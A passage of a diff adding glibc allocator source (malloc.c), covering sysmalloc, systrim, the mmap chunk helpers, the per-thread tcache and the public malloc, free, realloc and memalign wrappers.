+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
